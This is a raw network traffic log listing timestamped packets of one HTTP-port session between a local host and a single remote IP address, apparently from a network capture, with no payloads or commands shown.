Jun 21, 2023 04:27:57.874629974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874649048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.874695063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874741077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874785900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874805927 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.874850035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.874927044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.874957085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875000954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875045061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875089884 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875113010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.875154972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875174046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.875217915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875263929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875288010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.875324011 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.875346899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875394106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875438929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875485897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875508070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.875552893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875600100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875641108 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.875658989 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.875683069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875730038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875773907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875811100 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.875838995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875894070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.875909090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.875967026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876034021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876091957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876108885 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.876152039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876199007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876219988 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.876281977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876296997 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.876343012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876389027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876409054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.876454115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876501083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876545906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876565933 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.876610041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876655102 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876678944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.876714945 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.876740932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876787901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876835108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876853943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.876898050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876943111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.876975060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877021074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877118111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877144098 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.877144098 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.877175093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.877213001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877259016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877301931 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877324104 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.877367020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877412081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877456903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877480030 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.877525091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877571106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877593994 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.877645016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877660036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.877703905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877751112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877798080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877820015 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.877857924 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.877881050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877928972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877974987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.877998114 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.878041983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.878089905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.878110886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.878195047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.878247023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.878292084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.878314018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.878351927 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.878380060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.891721010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.903654099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.903704882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.903749943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.903794050 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.903815985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.903836966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.903951883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904006958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904021025 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904063940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904117107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904131889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904166937 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904192924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904241085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904294968 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904325962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904370070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904413939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904433966 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904469013 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904495955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904544115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904597998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904613972 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904656887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904710054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904723883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904757023 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904786110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904850960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904897928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.904937983 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.904957056 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905055046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905112982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905128002 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905167103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905219078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905263901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905284882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905325890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905349016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905404091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905419111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905459881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905483007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905531883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905553102 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905596972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905642033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905662060 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905706882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905752897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905775070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905810118 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905839920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905886889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905934095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.905953884 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.905997992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906043053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906115055 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906137943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906199932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906259060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906322002 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906418085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906465054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906497955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906522036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906533957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906568050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906588078 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906603098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906619072 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906640053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906675100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906693935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906708002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906719923 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906742096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906784058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906797886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906816959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906851053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906871080 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906883001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906896114 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906917095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906933069 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906951904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906970978 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.906985998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.906995058 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907021046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907036066 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907064915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907074928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907100916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907116890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907135963 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907151937 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907172918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907186985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907207012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907238007 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907241106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907264948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907274961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907308102 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907331944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907388926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907422066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907444000 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907454014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907464027 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907490015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907521963 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907542944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907555103 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907568932 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907620907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907653093 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907672882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907685995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907697916 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907721996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907753944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907773018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907788992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907795906 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907824039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907855034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907874107 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907887936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907896996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907923937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907937050 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907957077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.907972097 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.907987118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908013105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908020973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908032894 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908057928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908075094 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908092976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908113956 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908127069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908137083 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908160925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908183098 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908194065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908210993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908232927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908250093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908279896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908287048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908313990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908344984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908370018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908379078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908394098 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908436060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908463955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908489943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908494949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908514977 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908523083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908555031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908565044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908584118 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908590078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908606052 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908627033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908659935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908664942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908694029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908708096 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908708096 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908812046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908847094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908879042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908890009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908890009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908912897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908914089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908947945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.908952951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908972979 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.908982038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.909001112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.909040928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.909060955 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.909084082 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.916996956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.917046070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.917081118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.917114973 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.917166948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.934283018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934340000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934382915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934415102 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934453964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.934463978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934489012 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.934509039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934542894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934556961 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.934578896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934612989 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.934613943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934648037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.934665918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.937488079 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.959994078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960040092 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960063934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960087061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960108042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960112095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960138083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960150003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960163116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960186005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960208893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960232019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960253954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960290909 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960311890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960340023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960359097 CEST	80	49719	45.9.74.80	192.168.2.3
